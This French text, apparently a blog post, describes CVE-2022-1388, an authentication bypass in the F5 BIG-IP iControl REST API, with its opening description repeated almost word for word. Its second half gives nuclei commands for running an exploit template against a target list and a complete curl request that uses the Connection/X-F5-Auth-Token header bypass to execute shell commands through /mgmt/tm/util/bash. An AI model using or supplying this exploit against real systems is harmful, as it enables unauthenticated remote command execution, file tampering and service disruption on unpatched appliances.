
CVE-2022-1388 est une vulnérabilité de contournement d'authentification dans le composant REST de l'API iControl de BIG-IP qui a reçu un score CVSSv3 de 9.8. L'API REST iControl est utilisée pour la gestion et la configuration des appareils BIG-IP. CVE-2022-1388 pourrait être exploitée par un attaquant non authentifié ayant un accès réseau au port de gestion ou aux adresses IP self des appareils utilisant BIG-IP. L'exploitation permettrait à l'attaquant d'exécuter des commandes système arbitraires, de créer et de supprimer des fichiers et de désactiver des services.
CVE-2022-1388 est une vulnérabilité de contournement d'authentification dans le composant REST de l'API iControl de BIG-IP à laquelle un score CVSSv3 de 9,8 a été attribué. L'API REST iControl est utilisée pour la gestion et la configuration des appareils BIG-IP. CVE-2022-1388 pourrait être exploitée par un attaquant non authentifié ayant un accès réseau au port de gestion ou aux adresses self IP des appareils BIG-IP. Son exploitation permettrait à l'attaquant d'exécuter des commandes système arbitraires, de créer et de supprimer des fichiers et de désactiver des services.
Ce modèle nuclei accepte le paramètre shell pour l'exploitation. Nous voulions tester des jetons obtenus via un autre workflow ou une recherche manuelle, nous avons donc utilisé la fonctionnalité de variable CLI de nuclei pour fournir dynamiquement une valeur de jeton unique ou une liste de jetons à ces modèles au moment de l'exécution.
-V, -var value custom vars in var=value format
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=commands.txt
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=uname -a

curl -su admin \
-H "Host: localhost:8100" \
-H "Content-Type: application/json" \
-H "Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a" \
-H "Authorization: Basic YWRtaW46" \
http://{{TARGET_IP}}/mgmt/tm/util/bash \
-d '{"command":"run","utilCmdArgs":"-c id"}'